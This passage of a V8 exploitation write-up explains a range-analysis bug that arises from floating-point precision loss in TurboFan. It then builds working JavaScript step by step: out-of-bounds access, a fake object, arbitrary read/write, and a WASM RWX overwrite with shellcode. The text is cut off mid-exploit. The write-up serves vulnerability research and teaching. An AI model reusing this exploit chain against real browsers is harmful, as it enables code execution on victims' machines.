(-1)^sign * 2^(e) * fraction e = 2^(exponent - bias) bias = 1024 (for 64 bits doubles) fraction = bit52*2^-0 + bit51*2^-1 + .... bit0*2^52 So let's go through a few computation ourselves. d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0ddd0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0ddd8 0x433fffffffffffff d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0aec0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0aec8 0x4340000000000000 d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0de88 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0de90 0x4340000000000001 For each number, we'll have the following computation. You can try the computations using links 1, 2 and 3. As you see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles. That's why it is not possible to increment 9007199254740992. You can however add 2 to 9007199254740992 because the result can be represented! That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit. d8> var x = Number.MAX_SAFE_INTEGER + 1 9007199254740992 d8> x + 1 + 1 9007199254740992 d8> x + 2 9007199254740994 Therefore, those two graphs are not equivalent. Furthermore, the reducer does not update the type of the changed node. That's why it is going to be 'incorrectly' typed with the old Range(9007199254740992,9007199254740992), from the previous Typer phase, instead of Range(9007199254740994,9007199254740994) (even though the problem is that really, we cannot take for granted that there is no precision loss while computing m+n and therefore x += n; x += n; may not be equivalent to x += (n + n)). There is going to be a mismatch between the addition result 9007199254740994 and the range type with maximum value of 9007199254740992. What if we can use this buggy range analysis to get to reduce a CheckBounds node during the simplified lowering phase in a way that it would remove it? It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range to the length so that it believes that the index is in bounds when in reality it is not. Thus removing what seemed to be a useless bound check. Let's check this by having yet another look at the sea of nodes! First consider the following code. let opt_me = (x) => { let arr = new Array(1.1,1.2,1.3,1.4); arr2 = new Array(42.1,42.0,42.0); let y = (x == "foo") ? 4503599627370495 : 4503599627370493; let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992 // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction z = z - (4503599627370495*2); // max = 2 vs actual max = 4 return arr[z]; } opt_me(""); %OptimizeFunctionOnNextCall(opt_me); let res = opt_me("foo"); print(res); We do get a graph that looks exactly like the problematic drawing we showed before. Instead of getting two NumberAdd(x,1), we get only one with NumberAdd(x,2), which is not equivalent. The maximum value of z will be the following : d8> var x = 9007199254740992 d8> x = x + 2 // because of the buggy reducer! 9007199254740994 d8> x = x - (4503599627370495*2) 4 However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows : d8> var x = 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x - (4503599627370495*2) 2 Confirm that by looking at the graph. The index type used by CheckBounds is Range(0,2)(but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index looks to be always in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further (length is 4, we read at index 4. You could also have an array of length 3 and read at index 3 or 4.). Actually, if we execute the script, we get some OOB access and leak memory! $ d8 trigger.js --allow-natives-syntax 3.0046854007112e-310 Exploitation Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory. Improving the primitive One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough. For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out of bounds by 4 and not 2 anymore. d8> sum = 007199254740989 + 9007199254740966 x + 9014398509481956 d8> a = x + sum 18021597764222948 d8> b = x + 007199254740989 + 9007199254740966 18021597764222944 d8> a - b 4 And what if we do multiple additions to get even more precision loss? Like x + n + n + n + n to be transformed as x + 4n? d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966 undefined d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> x + sum 27035996273704904 d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966 27035996273704896 d8> 27035996273704904 - 27035996273704896 8 Now we get a delta of 8. Or maybe we could amplify even more the precision loss using other operators? d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> 10 * (x + 1 + 1) 90071992547409920 d8> 10 * (x + 2) 90071992547409940 That gives us a delta of 20 because precision_loss * 10 = 20 and the precision loss is of 2. Step 0 : Corrupting a FixedDoubleArray First, we want to observe the memory layout to know what we are leaking and what we want to overwrite exactly. For that, I simply use my custom %DumpObjects v8 runtime function. Also, I use an ArrayBuffer with two views: one Float64Array and one BigUint64Array to easily convert between 64 bits floats and 64 bits integers. let ab = new ArrayBuffer(8); let fv = new Float64Array(ab); let dv = new BigUint64Array(ab); let f2i = (f) => { fv[0] = f; return dv[0]; } let hexprintablei = (i) => { return (i).toString(16).padStart(16,"0"); } let debug = (x,z, leak) => { print("oob index is " + z); print("length is " + x.length); print("leaked 0x" + hexprintablei(f2i(leak))); %DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements }; let opt_me = (x) => { let arr = new Array(1.1,1.2,1.3); arr2 = new Array(42.1,42.0,42.0); let y = (x == "foo") ? 4503599627370495 : 4503599627370493; let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1; z = z - (4503599627370495*2); let leak = arr[z]; if (x == "foo") debug(arr,z, leak); return leak; } opt_me(""); %OptimizeFunctionOnNextCall(opt_me); let res = opt_me("foo"); That gives the following results : oob index is 4 length is 3 leaked 0x0000000300000000 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00002e5fddf8b6a8 0x00002af7fe681451 MAP_TYPE 0x00002e5fddf8b6b0 0x0000000300000000 0x00002e5fddf8b6b8 0x3ff199999999999a arr[0] 0x00002e5fddf8b6c0 0x3ff3333333333333 arr[1] 0x00002e5fddf8b6c8 0x3ff4cccccccccccd arr[2] ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00002e5fddf8b6d0 0x00002af7fe681451 MAP_TYPE // also arr[3] 0x00002e5fddf8b6d8 0x0000000300000000 arr[4] with OOB index! 0x00002e5fddf8b6e0 0x40450ccccccccccd arr2[0] == 42.1 0x00002e5fddf8b6e8 0x4045000000000000 arr2[1] == 42.0 0x00002e5fddf8b6f0 0x4045000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x00002e5fddf8b6f8 0x0000290fb3502cf1 MAP_TYPE arr2 JSArray 0x00002e5fddf8b700 0x00002af7fe680c19 FIXED_ARRAY_TYPE [as] 0x00002e5fddf8b708 0x00002e5fddf8b6d1 FIXED_DOUBLE_ARRAY_TYPE Obviously, both FixedDoubleArray of arr and arr2 are contiguous. At arr[3] we've got arr2's map and at arr[4] we've got arr2's elements length (encoded as an Smi, which is 32 bits even on 64 bit platforms). Please note that we changed a little bit the trigger code : < let arr = new Array(1.1,1.2,1.3,1.4); --- > let arr = new Array(1.1,1.2,1.3); Otherwise we would read/write the map instead, as demonstrates the following dump : oob index is 4 length is 4 leaked 0x0000057520401451 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] ----- 0x0000108bcf50b6c0 0x0000057520401451 MAP_TYPE 0x0000108bcf50b6c8 0x0000000400000000 0x0000108bcf50b6d0 0x3ff199999999999a arr[0] == 1.1 0x0000108bcf50b6d8 0x3ff3333333333333 arr[1] 0x0000108bcf50b6e0 0x3ff4cccccccccccd arr[2] 0x0000108bcf50b6e8 0x3ff6666666666666 arr[3] == 1.3 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x0000108bcf50b6f0 0x0000057520401451 MAP_TYPE arr[4] with OOB index! 0x0000108bcf50b6f8 0x0000000300000000 0x0000108bcf50b700 0x40450ccccccccccd 0x0000108bcf50b708 0x4045000000000000 0x0000108bcf50b710 0x4045000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000108bcf50b718 0x00001dd08d482cf1 MAP_TYPE 0x0000108bcf50b720 0x0000057520400c19 FIXED_ARRAY_TYPE Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store The problem with step 0 is that we merely overwrite the FixedDoubleArray's length ... which is pretty useless because it is not the field actually controlling the JSArray’s length the way we expect it, it just gives information about the memory allocated for the fixed array. Actually, the only length we want to corrupt is the one from the JSArray. Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that. d8> let a = new Array(0); undefined d8> a.push(1); 1 d8> %DebugPrint(a) DebugPrint: 0xd893a90aed1: [JSArray] - map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties] - prototype: 0x1cf26798fdb1 <JSArray[0]> - elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS] - length: 1 - properties: 0x367210500c19 <FixedArray[0]> { #length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor) } - elements: 0x0d893a90d1c9 <FixedArray[17]> { 0: 1 1-16: 0x3672105005a9 <the_hole> } In this case, even though the length of the JSArray is 1, the underlying FixedArray as a length of 17, which is just fine! But that is something that you want to keep in mind. If you want to get an OOB R/W primitive that's the JSArray's length that you want to overwrite. Also if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak a bit our code to target the JSArray's length! If you look at the memory dump, you may think that having the allocated JSArray before the FixedDoubleArray mightbe convenient, right? Right now the layout is: FIXED_DOUBLE_ARRAY_TYPE FIXED_DOUBLE_ARRAY_TYPE JS_ARRAY_TYPE Let's simply change the way we are allocating the second array. 23c23 < arr2 = new Array(42.1,42.0,42.0); --- > arr2 = Array.of(42.1,42.0,42.0); Now we have the following layout FIXED_DOUBLE_ARRAY_TYPE JS_ARRAY_TYPE FIXED_DOUBLE_ARRAY_TYPE oob index is 4 length is 3 leaked 0x000009d6e6600c19 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x000032adcd10b6b8 0x000009d6e6601451 MAP_TYPE 0x000032adcd10b6c0 0x0000000300000000 0x000032adcd10b6c8 0x3ff199999999999a arr[0] 0x000032adcd10b6d0 0x3ff3333333333333 arr[1] 0x000032adcd10b6d8 0x3ff4cccccccccccd arr[2] ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x000032adcd10b6e0 0x000009b41ff82d41 MAP_TYPE map arr[3] 0x000032adcd10b6e8 0x000009d6e6600c19 FIXED_ARRAY_TYPE properties arr[4] 0x000032adcd10b6f0 0x000032adcd10b729 FIXED_DOUBLE_ARRAY_TYPE elements 0x000032adcd10b6f8 0x0000000300000000 Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field. Thanks to the precision loss when transforming +1+1 into +2 we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 will give us this! d8> x + 1 + 1 + 1 9007199254740992 d8> x + 3 9007199254740996 26c26 < z = z + 1 + 1; --- > z = z + 1 + 1 + 1; Now we are able to read/write the JSArray's length. oob index is 6 length is 3 leaked 0x0000000300000000 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x000004144950b6e0 0x00001b7451b01451 MAP_TYPE 0x000004144950b6e8 0x0000000300000000 0x000004144950b6f0 0x3ff199999999999a // arr[0] 0x000004144950b6f8 0x3ff3333333333333 0x000004144950b700 0x3ff4cccccccccccd ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x000004144950b708 0x0000285651602d41 MAP_TYPE 0x000004144950b710 0x00001b7451b00c19 FIXED_ARRAY_TYPE 0x000004144950b718 0x000004144950b751 FIXED_DOUBLE_ARRAY_TYPE 0x000004144950b720 0x0000000300000000 // arr[6] Now to leak the ArrayBuffer's data, it's very easy. Just allocate it right after the second JSArray. let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays ab = new ArrayBuffer(AB_LENGTH); This way, we get the following memory layout : ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00003a4d7608bb48 0x000023fe25c01451 MAP_TYPE 0x00003a4d7608bb50 0x0000000300000000 0x00003a4d7608bb58 0x3ff199999999999a arr[0] 0x00003a4d7608bb60 0x3ff199999999999a 0x00003a4d7608bb68 0x3ff199999999999a ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x00003a4d7608bb70 0x000034dc44482d41 MAP_TYPE 0x00003a4d7608bb78 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bb80 0x00003a4d7608bba9 FIXED_DOUBLE_ARRAY_TYPE 0x00003a4d7608bb88 0x0000006400000000 ----- [ FIXED_ARRAY_TYPE : 0x18 ] ----- 0x00003a4d7608bb90 0x000023fe25c007a9 MAP_TYPE 0x00003a4d7608bb98 0x0000000100000000 0x00003a4d7608bba0 0x000023fe25c005a9 ODDBALL_TYPE ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] ----- 0x00003a4d7608bba8 0x000023fe25c01451 MAP_TYPE 0x00003a4d7608bbb0 0x0000000100000000 0x00003a4d7608bbb8 0x3ff3333333333333 arr2[0] ----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] ----- 0x00003a4d7608bbc0 0x000034dc444821b1 MAP_TYPE 0x00003a4d7608bbc8 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bbd0 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bbd8 0x0000000000000100 0x00003a4d7608bbe0 0x0000556b8fdaea00 ab's backing_store pointer! 0x00003a4d7608bbe8 0x0000000000000002 0x00003a4d7608bbf0 0x0000000000000000 0x00003a4d7608bbf8 0x0000000000000000 We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because memory pointed to by the backing_store is fully controlled by us, as we can put arbitrary data in it, through a data view (like a Uint32Array). Now that we know a pointer to some fully controlled content, let's go to step 2! Step 2 : Getting a fake object Arrays of PACKED_ELEMENTS can contain tagged pointers to JavaScript objects. For those unfamiliar with v8, the elements kind of a JsArray in v8 gives information about the type of elements it is storing. Read this if you want to know more about elements kind. d8> var objects = new Array(new Object()) d8> %DebugPrint(objects) DebugPrint: 0xd79e750aee9: [JSArray] - elements: 0x0d79e750af19 <FixedArray[1]> { 0: 0x0d79e750aeb1 <Object map = 0x19c550d80451> } 0x19c550d82d91: [Map] - elements kind: PACKED_ELEMENTS Therefore if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive. The idea is to simply put the address backing_store+1 in this array (the original pointer is not tagged, v8 expect pointers to JavaScript objects to be tagged). Let's first simply write the value 0x4141414141 in the controlled memory. Indeed, we know that the very first field of any object is a a pointer to a map (long story short, the map is the object that describes the type of the object. Other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post). Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map. Achieving this is as easy as allocating an array with an object pointer, looking for the index to the object pointer, and replacing it by the (tagged) pointer to the previously leaked backing_store. let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays evil_ab = new ArrayBuffer(AB_LENGTH); packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI); Quickly check the memory layout. ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x0000220f2ec82410 0x0000353622a01451 MAP_TYPE 0x0000220f2ec82418 0x0000000300000000 0x0000220f2ec82420 0x3ff199999999999a 0x0000220f2ec82428 0x3ff199999999999a 0x0000220f2ec82430 0x3ff199999999999a ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000220f2ec82438 0x0000261a44682d41 MAP_TYPE 0x0000220f2ec82440 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec82448 0x0000220f2ec82471 FIXED_DOUBLE_ARRAY_TYPE 0x0000220f2ec82450 0x0000006400000000 ----- [ FIXED_ARRAY_TYPE : 0x18 ] ----- 0x0000220f2ec82458 0x0000353622a007a9 MAP_TYPE 0x0000220f2ec82460 0x0000000100000000 0x0000220f2ec82468 0x0000353622a005a9 ODDBALL_TYPE ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] ----- 0x0000220f2ec82470 0x0000353622a01451 MAP_TYPE 0x0000220f2ec82478 0x0000000100000000 0x0000220f2ec82480 0x3ff3333333333333 ----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] ----- 0x0000220f2ec82488 0x0000261a446821b1 MAP_TYPE 0x0000220f2ec82490 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec82498 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec824a0 0x0000000000000100 0x0000220f2ec824a8 0x00005599e4b21f40 0x0000220f2ec824b0 0x0000000000000002 0x0000220f2ec824b8 0x0000000000000000 0x0000220f2ec824c0 0x0000000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000220f2ec824c8 0x0000261a44682de1 MAP_TYPE 0x0000220f2ec824d0 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec824d8 0x0000220f2ec824e9 FIXED_ARRAY_TYPE 0x0000220f2ec824e0 0x0000000300000000 ----- [ FIXED_ARRAY_TYPE : 0x28 ] ----- 0x0000220f2ec824e8 0x0000353622a007a9 MAP_TYPE 0x0000220f2ec824f0 0x0000000300000000 0x0000220f2ec824f8 0x0000001300000000 // MARK 1 for memory scanning 0x0000220f2ec82500 0x00002f3befd86b81 JS_OBJECT_TYPE 0x0000220f2ec82508 0x0000003700000000 // MARK 2 for memory scanning Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. Observe that we put markers so as to scan memory instead of hardcoding offsets (which would be bad if we were to have a different memory layout for whatever reason). After locating the (oob) index to the object pointer, simply overwrite it and use it. let view = new BigUint64Array(evil_ab); view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer // ... arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr); packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer Et voilà! Step 3 : Arbitrary read/write primitive Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that look like an actual object. More specifically, we would like to craft an ArrayBuffer with a controlled backing_store pointer. You can also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call! Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode). let view = new BigUint64Array(evil_ab); for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) { view[i] = f2i(arr2[ab_len_idx-3+i]); if (view[i] > 0x10000 && !(view[i] & 1n)) view[i] = 0x42424242n; // backing_store } // [...] arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer // [...] let rw_view = new Uint32Array(packed_elements_array[1]); rw_view[0] = 0x1337; // *0x42424242 = 0x1337 You should get a crash like this. $ d8 rw.js [+] corrupted JSArray's length [+] Found backingstore pointer : 0000555c593d9890 Received signal 11 SEGV_MAPERR 000042424242 ==== C stack trace =============================== [0x555c577b81a4] [0x7ffa0331a390] [0x555c5711b4ae] [0x555c5728c967] [0x555c572dc50f] [0x555c572dbea5] [0x555c572dbc55] [0x555c57431254] [0x555c572102fc] [0x555c57215f66] [0x555c576fadeb] [end of stack trace] Step 4 : Overwriting WASM RWX memory Now that's we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse(0vercl0k did this for SpiderMonkey). V8 used to have the JIT'ed code of its JSFunction located in RWX memory. But this is not the case anymore. However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is to instantiate a WASM module and from one of its function, simply find the WASM instance object that contains a pointer to the RWX memory in its field JumpTableStart. Plan of action: 1. Read the JSFunction's shared function info 2. Get the WASM exported function from the shared function info 3. Get the WASM instance from the exported function 4. Read the JumpTableStart field from the WASM instance As I mentioned above, I use a modified v8 engine for which I implemented a %DumpObjects feature that prints an annotated memory dump. It allows to very easily understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (Use it at your own risks as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it. %DumpObjects will pinpoint the pointer like this: ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- [...] 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX] So let's just find the RWX memory from a WASM function. sample_wasm.js can be found here. d8> load("sample_wasm.js") d8> %DumpObjects(global_test,10) ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 0x00002fac7911ed30 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911ed38 0x00000d1caca00691 FEEDBACK_CELL_TYPE 0x00002fac7911ed40 0x00002dc28a002001 CODE_TYPE ----- [ TRANSITION_ARRAY_TYPE : 0x30 ] ----- 0x00002fac7911ed48 0x00000cdfc0080b69 MAP_TYPE 0x00002fac7911ed50 0x0000000400000000 0x00002fac7911ed58 0x0000000000000000 function 1() { [native code] } d8> %DumpObjects(0x00002fac7911ecd9,11) ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 0x00002fac7911ed08 0x000000000000ff00 ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 52417812098265 d8> %DumpObjects(0x00002fac7911ecb1,11) ----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] ----- 0x00002fac7911ecb0 0x00000cdfc00857a9 MAP_TYPE 0x00002fac7911ecb8 0x00002dc28a002001 CODE_TYPE 0x00002fac7911ecc0 0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ecc8 0x0000000000000000 0x00002fac7911ecd0 0x0000000100000000 ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 52417812098225 d8> %DumpObjects(0x00002fac7911eb29,41) ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- 0x00002fac7911eb28 0x00001024ebc89411 MAP_TYPE 0x00002fac7911eb30 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb38 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb40 0x00002073d820bac1 WASM_MODULE_TYPE 0x00002fac7911eb48 0x00002073d820bcf1 JS_OBJECT_TYPE 0x00002fac7911eb50 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911eb58 0x00002fac7911ec59 WASM_MEMORY_TYPE 0x00002fac7911eb60 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb68 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb70 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb78 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb80 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb88 0x00002073d820bc79 FIXED_ARRAY_TYPE 0x00002fac7911eb90 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb98 0x00002073d820bc69 FOREIGN_TYPE 0x00002fac7911eba0 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eba8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ebb0 0x00000cdfc00801d1 ODDBALL_TYPE 0x00002fac7911ebb8 0x00002dc289f94d21 CODE_TYPE 0x00002fac7911ebc0 0x0000000000000000 0x00002fac7911ebc8 0x00007f9f9cf60000 0x00002fac7911ebd0 0x0000000000010000 0x00002fac7911ebd8 0x000000000000ffff 0x00002fac7911ebe0 0x0000556b3a3e0c00 0x00002fac7911ebe8 0x0000556b3a3ea630 0x00002fac7911ebf0 0x0000556b3a3ea620 0x00002fac7911ebf8 0x0000556b3a47c210 0x00002fac7911ec00 0x0000000000000000 0x00002fac7911ec08 0x0000556b3a47c230 0x00002fac7911ec10 0x0000000000000000 0x00002fac7911ec18 0x0000000000000000 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX] 0x00002fac7911ec28 0x0000556b3a47c250 0x00002fac7911ec30 0x0000556b3a47afa0 0x00002fac7911ec38 0x0000556b3a47afc0 ----- [ TUPLE2_TYPE : 0x18 ] ----- 0x00002fac7911ec40 0x00000cdfc00827c9 MAP_TYPE 0x00002fac7911ec48 0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ec50 0x00002073d820b849 JS_FUNCTION_TYPE ----- [ WASM_MEMORY_TYPE : 0x30 ] ----- 0x00002fac7911ec58 0x00001024ebc89e11 MAP_TYPE 0x00002fac7911ec60 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ec68 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 52417812097833 That gives us the following offsets: let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 }; Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode in it. Of course, you may want to backup the memory before so as to restore it after! Full exploit The full exploit looks like this: // spawn gnome calculator let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00]; let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 }; let log = this.print; let ab = new ArrayBuffer(8); let fv = new Float64Array(ab); let dv = new BigUint64Array(ab); let f2i = (f) => { fv[0] = f; return dv[0]; } let i2f = (i) => { dv[0] = BigInt(i); return fv[0]; } let tagFloat = (f) => { fv[0] = f; dv[0] += 1n; return fv[0]; } let hexprintablei = (i) => { return (i).toString(16).padStart(16,"0"); } let assert = (l,r,m) => { if (l != r) { log(hexprintablei(l) + " != " + hexprintablei(r)); log(m); throw "failed assert"; } return true; } let NEW_LENGTHSMI = 0x64; let NEW_LENGTH64 = 0x0000006400000000; let AB_LENGTH = 0x100; let MARK1SMI = 0x13; let MARK2SMI = 0x37; let MARK1 = 0x0000001300000000; let MARK2 = 0x0000003700000000; let ARRAYBUFFER_SIZE = 0x40; let PTR_SIZE = 8; let opt_me = (x) => { let MAGIC = 1.1; // don't move out of scope let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays 